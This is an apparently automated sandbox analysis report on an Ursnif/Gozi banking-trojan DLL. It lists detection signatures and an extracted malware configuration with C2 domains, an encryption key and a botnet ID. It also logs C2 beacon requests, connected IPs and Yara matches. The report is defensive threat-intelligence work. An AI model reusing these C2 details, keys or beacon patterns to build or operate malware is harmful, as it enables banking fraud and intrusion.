Windows Analysis Report 61b85f75e6a7c.dll

Overview

General Information

Sample Name: 61b85f75e6a7c.dll
Analysis ID: 539453
MD5: 26788bdf519813ff2600570a5c8e23d9
SHA1: 44f22a053e84cd7afcf34a4fa19dbf512c8a624d
SHA256: 25f74513f1f0a72453bf096337daba7268bf77371f7fc210f56672f52b7b3af1
Tags: brt, dll, exe, gozi, isfb, ursnif

Detection

Ursnif
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Writes to foreign memory regions
PE file has a writeable .text section
Writes or reads registry keys via WMI
Machine Learning detection for sample
Allocates memory in foreign processes
Modifies the prolog of user mode functions (user mode inline hooks)
Sigma detected: MSHTA Spawning Windows Shell
Sigma detected: Suspicious Call by Ordinal
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Creates a thread in another existing process (thread injection)
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Modifies the import address table of user mode modules (user mode IAT hooks)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to query CPU information (cpuid)
Contains functionality to launch a process as a different user
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
Contains long sleeps (>= 3 min)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file contains an invalid checksum
Searches for the Microsoft Outlook file path
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Registers a DLL
PE / OLE file has an invalid certificate
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Compiles C# or VB.Net code
Creates a process in suspended mode (likely to inject code)

Classification

AV Detection:

Found malware configuration
Source: 00000005.00000002.671518506.0000000002E10000.00000040.00000001.sdmp Malware Configuration Extractor: Ursnif {"RSA Public Key": "B+xl4hUTn5rXiL0afazu2ddSc/ECZk5wqODKe0fS2KdIXHYzLOi+LPPP1HVzyCQFE2ZPog7imXfWyeJPGgVZO8mmh7g0OCbF0hBgHX6wj0qY1fBDcQxYjLnhuuJTPFt0voqEKHGGIgbiz86prZpdJls6h0dECkyqCOUP77xD4bHwJFYwmMp7govarzlBsbdorQ4qNFnd4O2rK1GEuQisAwdMkb4j9MqHf7vkHewrh1BGBeNcr85NjoxXAnfZDuX+M7b1dWoszYHJF1rgWzk4yz7fc+7Q4leAIr2PkWbTRuRpOe4P6Ok01hKGTLORQhRgWw6Mv2aRFMimHgiQWhhaHetICEhMcBl5C0yxhZCOhu4=", "c2_domain": ["microsoft.com/windowsdisabler", "windows.update3.com", "berukoneru.website", "gerukoneru.website", "fortunarah.com"], "botnet": "8899", "server": "12", "serpent_key": "56473871MNTYAIDA", "sleep_time": "10", "CONF_TIMEOUT": "10", "SetWaitableTimer_value": "0", "DGA_count": "10"}
Machine Learning detection for sample
Source: 61b85f75e6a7c.dll Joe Sandbox ML: detected

Compliance:

Uses 32bit PE files
Source: 61b85f75e6a7c.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Source: Binary string: ntdll.pdb source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: loaddll32.exe, 00000000.00000003.593278567.0000000004C50000.00000004.00000001.sdmp, loaddll32.exe, 00000000.00000003.601958378.0000000004D10000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.587800871.0000000006510000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000003.605566748.0000000006510000.00000004.00000001.sdmp, rundll32.exe, 00000004.00000003.587317777.0000000005AC0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.598679645.00000000061B0000.00000004.00000001.sdmp, rundll32.exe, 00000005.00000003.608276934.00000000061B0000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 0000002A.00000003.671336061.000002081FBEF000.00000004.00000040.sdmp, control.exe, 0000002B.00000003.668289338.000001C8ACDEF000.00000004.00000040.sdmp
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0102D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 0_2_0102D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_010259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 0_2_010259E6
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 0_2_0103F63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053DF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 3_2_053DF63F
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053CD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 3_2_053CD1A3
Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_053C59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 3_2_053C59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04ABF63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 4_2_04ABF63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AAD1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 4_2_04AAD1A3
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 4_2_04AA59E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 4_2_04AA59E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C3F63F lstrlenW,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 5_2_04C3F63F
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C259E6 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 5_2_04C259E6
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 5_2_04C2D1A3 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 5_2_04C2D1A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_0103E230 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 0_2_0103E230

Networking:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: berukoneru.website
Source: C:\Windows\SysWOW64\regsvr32.exe Network Connect: 3.20.161.64 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 79.110.52.144 187
Source: C:\Windows\SysWOW64\regsvr32.exe Domain query: windows.update3.com
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 18.219.227.107 187
Source: C:\Windows\SysWOW64\rundll32.exe Network Connect: 3.12.124.139 187
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: AMAZON-02US
Source: Joe Sandbox View ASN Name: V4ESCROW-ASRO
Source: Joe Sandbox View ASN Name: AMAZON-02US
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: ce5f3254611a8c095a3d821d44539877
Uses a known web browser user agent for HTTP communication
Source: unknown DNS traffic detected: queries for: windows.update3.com
Source: global traffic HTTP traffic detected: GET /tire/jd_2FYT4kZR8w841QcBB1/tR81NFI9aRqohSRO/X0dydnORWplT5uR/5w00AG_2B_2FJ09dQQ/WUxRePiB4/GTOJFQ8FP8igXEjbgkH9/zEak3366_2FSVu5YatC/6c8yBLY3VgDZriaVuWUlRJ/NfUpYHR7DlV_2/FmC6rrvj/IWZqq_2FXZYrZ6Jfrjl4wOK/cOGNowVtID/CNlyDmEUAcdL6Nggn/Q6FP_2FvO/_2BU9JHdR/p.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/yIaXbfYof9IP/8B_2BPJ4_2B/hMnTiYTFHmvWMq/Om0JbLkmD_2F5koSu_2FY/nLk_2FKibFUJ9gOk/MZT8jf1B5RdC0UZ/6Z4No8ixNFmBVmH7Bj/uDf3BhOPM/DLBe_2Bd6mkqoP7YTIID/XBuFTJLHbx1D4QjnBWn/TnGiYGHPz2eGN6knS8Er2o/_2B5QVwmx2J_2/BE8gCb3N/ingbPXC9ZN_2BMhH2cvWH8p/CYnerQtz/Ddd.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/aZ8BheahozwZJezagn3wPqr/iz35YcAb_2/F5jeyfvVg2ICfCrEk/0rrw6u3U7gic/uqJTyp4A5eQ/0U2GqSt0iiLbUx/HO3viOhQ8WkG8vbfTOB_2/BnaqEkGKFXXYKGIR/Ctbh99dX8lvtuYg/YlazQ5uDO_2FKEL9Q_/2BJjb_2Fo/n4TKwNU4Z7gGvATNQb4t/rYS_2FADS/RnX9qstM/g.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/qmvui3Jef80_2BIeM_2BXh/O_2By54KPinsD/_2BFfpah/5k89w5bXqU7DEWhQp1iBEy2/_2BnU_2FsR/sUo3C8aISdxyIYl8W/JynqV_2BmddH/AgiN2_2BUrO/VCPQbezXreMebQ/izeoYIW_2BTEh6B2Zh_2B/L3PgbMDpsuFq53n5/obVS_2BHmsXbkex/IxU7ONkaq6S5id4E4C/VTSP2pp87/7bclEnvP5UuFRz5_2FIN/q_2FKVUn/a3U.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/pXEvhesP8JJkQtOX4Z5G/OiJKf20ix2ZGR09v_2B/AwevbnlWqTi_2FbmjeIBIJ/B8iREIEDTHJ8C/QPwxSlTX/9Ss6_2FUQqUE8Rtt6tkm28v/8Qb_2FbAb4/RcCK4EpQ3Lh0e_2BV/nW7_2F9KVPTc/RWwFawwnn1T/NBQ509K2MeA0Zg/X_2BL3B2nl1ByESW4otQy/_2FmAs1Ly6/iqZ3GWXa.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/XmFjtmy1jR6lateNyuPVYzk/zqxAUph9t_/2FhKh_2BKiBZEq6Pk/avtEml_2FYjs/Y8y781fyUpX/C_2FGsjVf_2F1i/tI0L_2Fc4mVHQ5jOtMGU8/MLBmn_2F0B4RgjE1/vjwq5A2_2B3O0OF/2xAZRByvalCt4EW7PP/8v2xGWGrY/70z8u8ipgSqR2XldqMkC/Q_2FRHW9LM53wtTl2y8/wrMCO.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/tEXumA952Z/iljgXIorkNbq6MNPU/M3Mb2CH8XEAs/ZvNkij3gQew/dxKPUhxVjzkBtZ/B3kMEs_2FJYP69uLJ0Zru/_2BYjun6ZVTrWBF0/nSePp_2BxhkopWf/iGbA1ax9WTenbT0BwC/JetFByiwf/3LiswTAhhMHb0jpdGXHw/RYbbpWHEDIwmZCcWi7e/zfbtXmV0tr/6_2BifPd.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/gzRMSfagaZDYqNWCuNWpBQY/d3QH3HcNtD/fG3zb1_2FY310Wc1Z/tU68j9ArrsrY/cG2nzLaOesJ/1fJaUxYEiS_2Fq/6VuTPCoO1fL43Db5nwE4B/eNIHObz48Uk8thb4/s2ZGHDbOs4GyVjB/HB5iQTw6wsHP9eF2fL/ehbbJ4i3G/wutxyBgCPuYINeY4btAA/_2FftqK8_2FJ53N0BbQ/E4DqjTtkOXgod/z7et.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/k0k9N5zvmOwLqrZ9t/mA_2BT5LewRQ/XIHVxnLBVoU/TCE3xXfm5Bjx_2/FNwBkfDvRbJwwM4AJLewo/S2GmqFJJAf16v117/0Fd8Da4X45K7ewO/ZOOFQH9lFoxITYmiaW/UM4b3mHcB/fh9cKbdZnHyGiZkOZevh/xKEuDuLDKEmBX5F2T0A/HlQglDHz0FPghDE04k7Rtp/qlpZkGrY6jSqN/zGqWq5UgJ/rU.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/YD_2F3yJEGCuLOsTrEXJLr/HYLMnHFPJYjiw/7tKlG8tS/_2BbBwzFFUBrFGVOQLc5STZ/vcc52sXSbU/E9hymn9Lr8ZbD9qxB/Q3FPG7MgMTRh/kGaKVJ7xEwY/wcc7fc8ZQUc61Z/HBzqpDy8uRQEtHRcSSjiO/YH3881lPkApc1W7g/7TBJUbFugsSMYgd/TFU1BUGgDWNFTw3w_2/FKBKIQxkn/wyKgErA3/rpA.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/KjB2BgkWWh/2R_2Fkj8GC7yaP1kC/DPb_2B003_2B/KSHrvwTkEkd/_2FAMHiah0zctf/nNbEHjkCSlyuZxandMk7W/125Nt4kKNIyzhV_2/FpQlU2nlzM_2FEI/PEryRBP68LWoGHV3sm/y9L4VUWvc/E0UlFXDmQ0_2F2mVHcN_/2B13NnOs91EWboOkL1Q/soeab74L05htIewL3_2FTu/VD2Jph.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: global traffic HTTP traffic detected: GET /tire/m4jBg57LO/F3omyPFCoq2BsJvvqQjq/M_2Frtvqdkes1JW5OTL/BNOx14m03YJ94TjlPw0PZA/GLczTuNVmCYMu/71GtDP5r/ukrg4HqiGfIkYNEYalZxMet/SDWbFyptRt/KM_2FafHnmbZCQsUs/pLVEK0s2DOMd/NxrlfGMBoYt/93NMnwEIHPr7kq/Wl1k8ZjV32EJB93_2FhHV/Qjw6VJUmVv/3MpXPnj1D/cD.eta HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0) Host: berukoneru.website
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49812 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49813 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49814 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49815 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49816 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49817 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49820 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49821 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49822 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49823 version: TLS 1.2
Source: unknown HTTPS traffic detected: 79.110.52.144:443 -> 192.168.2.6:49825 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Ursnif
Source: Yara match File source: 00000004.00000003.516477194.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.472386293.0000000003AD8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519108386.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518961591.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.664429538.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.571761506.0000000005A68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.517518068.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520102514.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.470175062.0000000004F58000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.471268308.0000000005818000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.571873889.0000000006198000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.520620067.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.517906088.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.494184695.000000000543B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.470929059.00000000055B8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.519944178.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.573864937.0000000004B38000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.493926850.0000000004DDB000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.617274009.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.495487329.000000000395B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.574142026.00000000064F8000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.518696418.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.494405815.000000000569B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.518133566.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.517688433.000000000533D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000003.00000003.654830894.000000000559D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000003.517563234.0000000004CDD000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.647561301.000000000385D000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: loaddll32.exe PID: 6132, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 7016, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7056, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 7084, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5832, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: control.exe PID: 5952, type: MEMORYSTR

E-Banking Fraud:

Yara detected Ursnif

System Summary:

Malicious sample detected (through community Yara rule)
Source: 0000002B.00000003.654015675.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665205397.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.646797077.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000002.672804505.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.654119494.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.656058284.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.654247659.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000002.675606081.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665814444.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000002.678328822.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.668236157.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665936596.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.647071463.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.671175308.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.654303874.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.647295334.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.655646861.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.665894712.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002D.00000003.647415527.000001575C7BC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002A.00000003.671422400.000002081FCEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
Source: 0000002B.00000003.668321842.000001C8ACEEC000.00000004.00000040.sdmp, type: MEMORY Matched rule: Win32.Gozi Author: CCN-CERT
PE file has a writeable .text section
Source: 61b85f75e6a7c.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Writes or reads registry keys via WMI
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetDWORDValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetStringValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::CreateKey
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetBinaryValue
Source: C:\Windows\System32\loaddll32.exe WMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::SetBinaryValue
